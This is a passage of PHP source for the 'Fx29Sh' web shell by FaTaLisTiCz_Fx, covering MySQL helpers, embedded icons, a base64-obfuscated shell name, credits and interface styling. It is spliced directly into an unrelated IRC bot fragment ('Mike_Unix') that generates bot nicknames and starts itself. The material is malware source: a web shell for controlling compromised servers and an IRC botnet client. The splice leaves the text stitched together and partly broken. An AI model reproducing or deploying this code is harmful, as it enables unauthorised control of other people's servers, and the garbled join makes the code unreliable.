3126   if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
3127 }
3128 function mysql_create_db($db,$sock="") {
3129   $sql = "CREATE DATABASE `".addslashes($db)."`;";
3130   if ($sock) {return mysql_query($sql,$sock);}
3131   else {return mysql_query($sql);}
3132 }
3133 function mysql_query_parse($query) {
3134   $query = trim($query);
3135   $arr = explode (" ",$query);
3136   $types = array(
3137     "SELECT"=>array(3,1),
3138     "SHOW"=>array(2,1),
3139     "DELETE"=>array(1),
3140     "DROP"=>array(1)
3141   );
3142   $result = array();
3143   $op = strtoupper($arr[0]);
3144   if (is_array($types[$op])) {
3145     $result["propertions"] = $types[$op];
3146     $result["query"]  = $query;
3147     if ($types[$op] == 2) {
3148       foreach($arr as $k=>$v) {
3149         if (strtoupper($v) == "LIMIT") {
3150           $result["limit"] = $arr[$k+1];
3151           $result["limit"] = explode(",",$result["limit"]);
3152           if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
3153           unset($arr[$k],$arr[$k+1]);
3154         }
3155       }
3156     }
3157   }
3158   else { return FALSE; }
3159 }
3160 ###[ END OF MYSQL FUNCTIONS ]###
3161 ###[ IMAGES ]###
3162 function imagez() {
3163   $images = array(
3164   "home"=>
3165 'R0lGODlhEwAYALMJAH6+91OZ97zp/l6x/Y/V/iVr7DGQ/QwxyAEKpP///wAAAAAAAAAAAAAAAAAA'.
3166 'AAAAACH5BAHoAwkALAAAAAATABgAAASoMEkJwrwYAyEqyFkQcFwFTuJAkF1xDkExAARdAy4W4EUw'.
3167 'zwAALEfhFQy+5AAWmwwLUIN0OhPlBjLocSpdDgzYBLYnjXa/U1fMQD6auWzxMQBmn0XpBJ6OB6fs'.
3168 'cXwiPl5LBwgIdGqDhV4FiImBKV5CQQGQPjlgS0GVMJBfRD5BBDU1l4g+BxcGNqYEAQeHBasYBqW4'.
3169 'sLK1IAUcK7onFwWlOMIZB0THyxgRADs=',
3170   "buffer"=>
3171 'R0lGODlhGAAWALMJABo+qGql77zK4OPw+pXE9Tx33mOCxx5WzYyv4v///wAAAAAAAAAAAAAAAAAA'.
3172 'AAAAACH5BAHoAwkALAAAAAAYABYAAASbMMlJa0LFao0QMZslDMJFEEGhhtPgul4gFwebvK9BICnN'.
3173 '4oPOACU7HAAb3Gl4mtGQltfSdSI+AdAWVVlNGbHZmxTYVB3BUOCI2vR+AQaQZL1lz74GhEAgn48I'.
3174 'bCg0BwV7ewh9AgSGgEM9ASOGe32NiwFMAY0ukgZhU1WaOHxhE0tTQCR9GksIqHyqG4qnQbAsAkK0'.
3175 'NhsFiLq+NhEAOw==',
3176   "search"=>
3177 'R0lGODlhGAAXAKIEAHl5ecbGxqCgoOvr6////wAAAAAAAAAAACH5BAHoAwQALAAAAAAYABcAAANq'.
3178 'SLq88iK02UIM1kY67fgDhj3c4oGiKJRK9mUpycFpHQClHbw8zl2iEOjlo9SEw1DRuNsliaygMwlY'.
3179 'di7PgcDKUD2moW1utAVAHtUS9maGmLkOTBiudrJZk3Uaz4gQ6XUYe3wNb4CEiImKCQA7',
3180   "back"=>
3181 'R0lGODlhGAAYALMJAC9ILkesPbHdo3W0Zi2IJ+f141aOUTRoM4LKdP///wAAAAAAAAAAAAAAAAAA'.
3182 'AAAAACH5BAHoAwkALAAAAAAYABgAAASwMMlJq7046zSM/8YmeYNgFiZiHMdmCEVszoIaXscLpwhC'.
3183 'dy2LASETlAoBXw8xCFYMqNQuWesBK4OjkVgYLL8B52h2LCCS2WxgECAAJiteLNarMtduOEE678/P'.
3184 'bW8jBzVefigybIEUQz0BMF0EAZOTkm6CEgCNbFOUngR5FAdLazCAlKChomt3ASiolpiMB5OKbJZt'.
3185 'oLIVtJ6VuaoXAAepxbq7GcTFAMgbzM/NItLTGxEAOw==',
3186   "forward"=>
3187 'R0lGODlhGAAYAKIGAB9fHVu2T7nirIbKdjaXL+z36P///wAAACH5BAHoAwYALAAAAAAYABgAAAOc'.
3188 'aLrc/g1ICSsZIosRSGWXUGjaQAAfIY7Z4GIc+qgFy734+Qxsy2+BV8dBGPVeI04wEJAtfiSgSMCs'.
3189 'Og2AEu5Wo1Z1iuwGsymvChxCxynG1N7wWocAxmaCGVZcQKezYVVfPCNzJ1cBYzdMF4R9dWEwQkFy'.
3190 'hY8KF5KIaI6WYUGKS5ydYReBapxXDgBqpn0UH2Grjq+wDBMTtbm6uwsJADs=',
3191   "up"=>
3192 'R0lGODlhGAAXAKIGABxXG0irPrLeo3zFbzWFMOLz3v///wAAACH5BAHoAwYALAAAAAAYABcAAAOP'.
3193 'aLrc/jBKMoa4lRCp6C1XOASbNBQgVq1D6XipsAYs+RCoAFZ5QNMEQIOSq+hQO59PyAjoMEckauQL'.
3194 'MnBQaS5JYnZ2Tx6INu5ed5bRqUClmhcEEU3srlrhIZlsXSe8OxZ6K1NKJAFecIEshFV/CwBONRiN'.
3195 'dy9zFYVKGohDlz92AJw3mSRBohGhqaEcrK2uDgkAOw==',
3196   "help"=>
3197 'R0lGODlhGAAYAKIGADlqzKjA6O3x932d3rPk/12Byv///wAAACH5BAHoAwYALAAAAAAYABgAAAOa'.
3198 'aLor7ixK8+qb0eqLN/mENVlfYJpDUEkPMaSh474xwbTvsA3AEN8CV6GgEhR6Dh5SEFA8BkeASgmQ'.
3199 'Aa4/igMQvXoLjoBXJ3AGu95rMQ0ua8Vpb5HKhWgJ8SsZfbVb8ypwaWRmRoACdHp2Wol5aTINW3Ep'.
3200 'fHtAgn1MbByRmnKIXw8FLE9fV0ScEkVhKSYrGAqrG02wEa6stbm6CQA7',
3201   "change"=>
3202 'R0lGODlhEAAQALMMADMuME2f58e2ON7OMsXZ88wpTd/t/FhYU4x9erCwrIWSpW54iwAAAAAAAAAA'.
3203 'AAAAACH5BAHoAwwALAAAAAAQABAAAARckMlJ6wQn6wMsW0QoBktXLUaaEkHAIYiJqiuhFAUg0yqR'.
3204 'IAKdZMYzIAacCbGXEAyEQ0IvlEAeKCCDVJpompRbkUJzEokBi0XZTFgoCFfKwa1Q0NNxCmazz3v+'.
3205 'DBEAOw==',
3206   "delete"=>
3207 'R0lGODlhEAAQAKIGAJIMJNMHLckjQURDQ2oqNigoKAAAAAAAACH5BAHoAwYALAAAAAAQABAAAANP'.
3208 'KDHW/k4JBiuRFI5pilBE8RQX12yBIHYfMGTeNxQoMVfbJ7gZ5AWpV8VBU6SGkVSpR7zwdISKURgz'.
3209 'dS4B2yMXMgyAWo2OBGQ6cq+NmbhJAAA7',
3210   "download"=>
3211   "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
3212   "AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
3213   "EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
3214   "setup"=>
3215   "R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
3216   "QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
3217   "ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
3218   "qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
3219   "OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
3220   "small_dir"=>
3221 'R0lGODlhDwAQALMPAAkJCXV3iEFvz5it4MXV8lFkqXaU2au+6EtMViQkJYGGq2JjcUFhunN3ljc3'.
3222 'OQAAACH5BAHoAw8ALAAAAAAPABAAAARuEKDVVEsv64wO+UfjOBO1AM2nHsbQGkaDDCo43EdOVPW9'.
3223 'ErmFgjDI6YyHm7AINN5cMESgSH3CBAKGo9GCwgxYrHbx/YbDYwEYfEY7Fu149s2QZxkFRQJRR+Mb'.
3224 'AQsOAA98DH8NggCEGgmAiowbGREAOw==',
3225   "small_unk"=>
3226 'R0lGODlhEAAQAKIHABpFnoap3bTL89vq/FuCvVZlhH6Ms////yH5BAHoAwcALAAAAAAQABAAAANL'.
3227 'eBfcrVCFQetgJS5bA/nRxFlGJlUFoBICZUDi6gGsYG5DWqntLZI8G4xDCApPHeMR5wL8lgbSE9rq'.
3228 'OavUqurngTm+ntuhQC6byYcEADs=',
3229   "multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
3230   "pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
3231   "sort_asc"=>
3232   "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
3233   "SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
3234   "sort_desc"=>
3235   "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
3236   "SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
3237   "ext_asp"=>
3238   "R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
3239   "/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
3240   "D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
3241   "ext_mp3"=>
3242 'R0lGODlhEAARALMPADE8XE6ekMSuNMDW7M1IRGRoZOXs9Ki31Y2HW3PEiFl2u19RX4ajzNmCeuew'.
3243 'pwAAACH5BAHoAw8ALAAAAAAQABEAAASI8D1Gqy0yM8O7GRSmeR2oKOJEcgN4oJJyNExSD197iAjS'.
3244 'OI2EkIFrYQqN3+cgRBA/iwLhh+MwE4HDYLeYGg4MLTNQCBi7joECcKKQC9tCV7tmhwoALV5BPMnA'.
3245 'PXk7BSc5LA4CCAUHXCcHHogChIwYbG2RkgVhOxKWCggCkgCafCkAp6inBaurEQA7',
3246   "ext_avi"=>
3247 'R0lGODlhEAAQALMMAAUFBY2OkM7T2UpKSqWoq+zz/GhoaSQkJLW4u1paWnp6ejY3NwAAAAAAAAAA'.
3248 'AAAAACH5BAHoAwwALAAAAAAQABAAAARdkMkpgVGH6poIwttkeQUBbqNQrGZGjYG6lobLWAoixHOw'.
3249 'GByDbpUrAQ6K2+AoW/0OyOMy4GtioozBgsAaqBDa08AwoxHCgMmPRzSM05R17x2SBxKn+uUCD0nW'.
3250 'fRoRADs=',
3251   "ext_cgi"=>
3252 'R0lGODlhEAAQAKIHAEhJS+q8D/7dNfnulpR/U5pqCtS5eP///yH5BAHoAwcALAAAAAAQABAAAANT'.
3253 'eLpX/K9ISItwlElBcG5BMEFSGYolVgzsYAih0Q5FF7IwjAcdcRCE021wKQB8CqCQRQAcH4SXYOck'.
3254 'EQUy2DMSMmaBEWITSBAjFZLxAliDghlkRQIAOw==',
3255   "ext_cmd"=>
3256   "R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
3257   "eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
3258   "dmrYAMn1onq/YKpjvEgAADs=",
3259   "ext_cpp"=>
3260   "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
3261   "WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
3262   "Eq7YrLDE7a4SADs=",
3263   "ext_ini"=>
3264   "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
3265   "aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
3266   "SnEjgPVarHEHgrB43JvszsQEADs=",
3267   "ext_diz"=>
3268 'R0lGODlhEAAQAKIHAAsZcWyPv7vT6eb0/ThOi1tukZyyy////yH5BAHoAwcALAAAAAAQABAAAANS'.
3269 'eHrTLiu6IYh5chZAJlRTI4RDcIyacXkF6gAcWaxPLFJzaNhoZYyoXQcoCMwErgCHuFP8kEVjAGkg'.
3270 'FBaqJ9CgvEYOBQK06/0qjlazuSBVr8uLBAA7',
3271   "ext_doc"=>
3272   "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
3273   "WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
3274   "MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
3275   "ext_exe"=>
3276   "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
3277   "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
3278   "xhIAOw==",
3279   "ext_h"=>
3280   "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
3281   "WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
3282   "Wq/NknbbSgAAOw==",
3283   "ext_hpp"=>
3284   "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
3285   "WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
3286   "UqUagnbLdZa+YFcCADs=",
3287   "ext_htaccess"=>
3288   "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
3289   "WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
3290   "AAA7",
3291   "ext_html"=>
3292 'R0lGODlhEAAQALMOAIyt016Itv///2Gp4uXy/c3P/MXl/mtrnC6Z4mfd/Chgk7PO9lBVhnNzc///'.
3293 '/wAAACH5BAHoAw4ALAAAAAAQABAAAASF0EkHqq1h6nuzloAgjkIwfJRIFJVxFMgHDGYQCMihe46d'.
3294 '/IiBIEEQFA4SkwHBZAaKK2RPAFAACM0nwTUFMAeD5mFBWCCpTIV6rSCbKQkFQpEw2A1lw4LRa84X'.
3295 'cn96fAg4gQgJAwwAensOAyFzCgyTAAsFgxKQAywVBZcGn3wTDKWlDaamEQA7',
3296   "ext_jpg"=>
3297 'R0lGODlhDgAQALMMACYlIC6NFLOxKnqIcbPIikWoIkVFRWllROLZUmO8NqKmoBBxCAAAAAAAAAAA'.
3298 'AAAAACH5BAHoAwwALAAAAAAOABAAAARbMKxJ6zw2iGQHFSACCpQ3CWJISmaBCsABcouJiECOIkVg'.
3299 '7gadiBXoAXc9X/LGRBASvUEPmiA4qUXpFPpMZrHQojchJZjDVOpgoGib3+82W8Gu0+nrGD2Y4wcN'.
3300 'EQA7',
3301   "ext_js"=>
3302 'R0lGODlhDwAQAKIEAB4eHZ6eaOLih2BgWQAAAAAAAAAAAAAAACH5BAHoAwQALAAAAAAPABAAAANP'.
3303 'SAoR8nAARcZ4rQkr68VCI1nTB4Vj0H1iALzwpIUY3FXOKb4UwYSqDODmY+ROREtmkEFNhqKRyfV7'.
3304 'SFzHEQR62qSAnBxJoVSlxhRJLEZJAAA7',
3305   "ext_lnk"=>
3306 'R0lGODlhEAAQAKIHAAAFACOPE2TNNj60IQRKAojuVgdlBAAAACH5BAHoAwcALAAAAAAQABAAAANO'.
3307 'eGfcbkCpQOu4AkZlLM5AKHlCqW3TVw4hmqqlKB3UKhQF6AZ2ibM7Ew+Xk6UIoQAROAsgQ4RbIWBc'.
3308 'tBbSq0RruD1dB1S3BZ5ZteYZ2ZwAADs=',
3309   "ext_log"=>
3310   "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
3311   "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
3312   "zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
3313   "ext_php"=>
3314 'R0lGODlhEAAQAIABAP///////yH5BAHoAwEALAAAAAAQABAAAAIohI8Jwe0Po5wNsRWWxbl3blSe'.
3315 'VmHmMWZouj2md7kxB8cfhec6pPRHAQA7',
3316   "ext_pl"=>
3317   "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
3318   "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
3319   "ext_swf"=>
3320   "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
3321   "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
3322   "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
3323   "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
3324   "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
3325   "ext_tar"=>
3326 'R0lGODlhEAAQAKIFABokHymwoKiYkKIYbdzo4wAAAAAAAAAAACH5BAHoAwUALAAAAAAQABAAAAM4'.
3327 'CLrcJVCMSesAJJOhY7waAUgWhWljo67rE7FMGGhzYNtnNt48HsJAlgsSzIlovYAxlfShBMVoIQEA'.
3328 'Ow==',
3329   "ext_txt"=>
3330 'R0lGODlhCwAQAKIFACoqKqCeoO/z83d2brO2vwAAAAAAAAAAACH5BAHoAwUALAAAAAALABAAAAM5'.
3331 'CLM8MSBIJwNZJAhNRBdDR3xCCYqkGXppuZrwuVWj21mVJo+jZG812Cv288VWD+KQtQA4m4CCdJoA'.
3332 'ADs=',
3333   "ext_wri"=>
3334   "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
3335   "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
3336   "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
3337   "ext_xml"=>
3338   "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
3339   "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3340   "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
3341   "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
3342   "IQA7"
3343   );
3344   return $images;
3345 }
3346 function sh_name() { return base64_decode("RmFUYUxpc1RpQ3pfRnggRngyOVNoZUxMIHY=").sh_ver; }
3347 function fx29sh_tools() {
3348   echo "<div class=\"barheader\">.: TooLz :.</div>";
3349 }
3350 function fx29sh_about() {
3351   echo "<div class=\"barheader\">.: Credits :.</div>".
3352        "Idea, leader & coder: <b>tristram [CCTeaM]</b><br>".
3353        "Beta-tester & tips: <b>NukLeoN [AnTiSh@Re tEaM]</b><br>".
3354        "Re-coder, Designer, Windows Fix, PHP Mailer & PHP Filesystem: <b>FaTaLisTiCz_Fx [FeeLCoMz CoMMuNiTy]</b><br>".
3355        "<br>".
3356        "Please report bugs to <a href=\"mailto:yankeemoore55@gmail.com\">FaTaLisTiCz_Fx</a></b>\n";
3357 }
3358 function html_style() {
3359 $style = '<html>
3360 <head>
3361     <style>
3362         table {width: 100%;border-collapse: collapse;}
3363         #main, #maininfo {width: 900px;}
3364         body, table, input, select, option, .info
3365         {
3366             font: 8pt tahoma;
3367         }
3368         .footer {font: 7pt tahoma;}
3369         textarea, .code
3370         {
3371             font: 8pt Courier New;
3372             color: #dedbde;
3373             border: 1px solid #666666;
3374         }
3375         img {border: 0;}
3376         #maininfo img {width: 16;height: 16;}
3377         input, select, option {border: 1px solid #606060;}
3378         #maininfo, td, th {border: 1px solid #3F3F3F;}
3379         a {color: #5B5BFF;text-decoration: none;}
3380         #pagebar a, .barheader a {color: #00FF00;}
3381         a:hover, #pagebar a:hover {color: #3366FF;}
3382         .on {color: #00FF00;}
3383         .off, .errmsg {color: #FF0000;}
3384         body, table, input, select, option {color : #EEEEEE;}
3385         .info th {color: #969696;width: 13%;}
3386         .shell {font-size: 12;color: #C0C0C0;border: 0;}
3387         #pagebar a, .barheader, .errmsg, .on, .off
3388         {
3389             font-weight: bold;
3390         }
3391         p, form, .info, .info td, .info th, .explorer *
3392         {
3393             margin: 0;
3394         }
3395         input, #maininfo {margin: 3px;}
3396         #mainpanel input, #mainpanel select
3397         {
3398           margin: 0px 2px 0px 2px;
3399         }
3400         #maininfo table, select {margin: 2px 0px 2px 0px;}
3401         #pagebar, .bartitle, #mainpanel {background: #474747;}
3402         body, textarea, .shell, input, select, option
3403         {
3404             background: #000000;
3405         }
3406         .info, .info th, .info td, input[type="label"]
3407         {
3408             background: transparent;
3409             border: 0;
3410         }
3411         #pagebar td, #mainpanel td, #mainpanel th, .contents th, .explorer td
3412         {
3413             border-left: 0;
3414             border-right: 0;
3415         }
3416         .bartitle, .barheader, input[type="submit"], input[type="button"], input[type="reset"]
3417         {
3418             color: #D0D0D0;
3419             background: #3F3F3F;
3420             border: 1px solid #202020;
3421             border-top: 1px solid #505050;
3422             border-left: 1px solid #505050;
3423         }
3424         input[type="submit"]:hover, input[type="button"]:hover, input[type="reset"]:hover
3425         {
3426             color: #00FF00;
3427             background: #333333;
3428         }
3429         td, .info th {vertical-align: top;}
3430         .explorer td {vertical-align: middle;}
3431         .fleft {float: left;}
3432         .fright {float: right;}
3433         .code, .fleft, .info th {text-align: left;}
3434         .fright, input[type="label"], #mainpanel th, .contents th
3435         {
3436             text-align: right;
3437         }
3438         #maininfo, .bartitle, .quicklaunch, .quicklaunch a, .barheader, th
3439         {
3440             text-align: center;
3441         }
3442         td, textarea, input[type="text"], .bartitle, .barheader, .code, th
3443         {
3444             padding: 3px;
3445         }
3446         .info th, .info td {padding: 0px 2px 0px 2px;}
3447         .quicklaunch a {padding : 0px 5px 0px 5px;}
3448     </style>
3449     <title>'.getenv("HTTP_HOST").' - '.sh_name().'</title>
3450 </head>
3451 <body><center>
3452 ';
3453 return $style;
3454 };
3455 function html_header() { return "<b>".sh_name()."</b><br>.: No System is Perfectly Safe :."; }
3456 function html_footer() { return "&copy; 2008 By FaTaLisTiCz_Fx, FeeLCoMz Community. Generated: ".round(getmicrotime()-starttime,4)." seconds"; }
3457 function disp_error($msg) { echo "<div class=errmsg>$msg</div>\n"; }
3458 function srv_info($title,$contents) { echo "\t\t\t<tr><th>$title</th><td>:</td><td>$contents</td></tr>\n"; }
3459 function srv_software($surl) {
3460   $srv_software = getenv("SERVER_SOFTWARE");
3461   if (!ereg("PHP/".phpversion(),$srv_software)) { $srv_software .= ". PHP/".phpversion(); }
3462   return str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\">PHP/".phpversion()."</a>",htmlspecialchars($srv_software));
3463 }
3464 ####################################
3465 ###[ END OF FUNCTIONS ]###
3466 ####################################
3467 chdir($lastdir); fx29shexit();
3468 #######################################
3469 ###[ FeeLCoMz Community ]###
3470 #######################################
3471 ?>         }
3472 
3473          function busk_nick()
3474 
3475          {
3476 
3477             $prefix .= "[RooT|LinuX|";
3478 
3479             $random_number = "";
3480 
3481             for( $i = 0; $i < $this->config[ 'maxrand' ]; $i++ )
3482 
3483             {
3484 
3485                 $random_number .= mt_rand( 0, 9 );
3486 
3487             }
3488             $this->nick = sprintf( $prefix.$this->config[ 'nickform2' ], $random_number );
3489 
3490             $this->send("NICK ".$this->nick);
3491 
3492          }
3493 
3494          function nzm_nick()
3495 
3496          {
3497 
3498             $prefix .= "[USA|";
3499 
3500             $random_number = "";
3501 
3502             for( $i = 0; $i < $this->config[ 'maxrand' ]; $i++ )
3503 
3504             {
3505 
3506                 $random_number .= mt_rand( 0, 9 );
3507 
3508             }
3509 
3510             $ffffu = "$this->config[ 'prfix' ]";
3511 
3512             $this->nick = sprintf( $prefix.$this->config['prfix'], $random_number );
3513 
3514             $this->send("NICK ".$this->nick);
3515 
3516          }
3517         function parse_url_s( $url )
3518 
3519         {
3520 
3521             $URLpcs = ( parse_url( $url ) );
3522 
3523             $PathPcs = explode( "/", $URLpcs['path'] );
3524 
3525             $URLpcs['file'] = end( $PathPcs );
3526 
3527             unset( $PathPcs[ key( $PathPcs ) ] );
3528 
3529             $URLpcs['dir'] = implode("/",$PathPcs);
3530             $fileext = explode( '.', $URLpcs['file'] );
3531             if(count($fileext))
3532 
3533             {
3534 
3535                 $URLpcs['file_ext'] = $fileext[ count( $fileext ) - 1 ];
3536 
3537             }
3538             return ($URLpcs);
3539 
3540         }
3541 
3542     }
3543     $bot = new Mike_Unix;
3544 
3545     $bot->start();
3546 ?>

FaTaLisTiCz_Fx Fx29 Shell Screenshot

FaTaLisTiCz_Fx Shell screenshot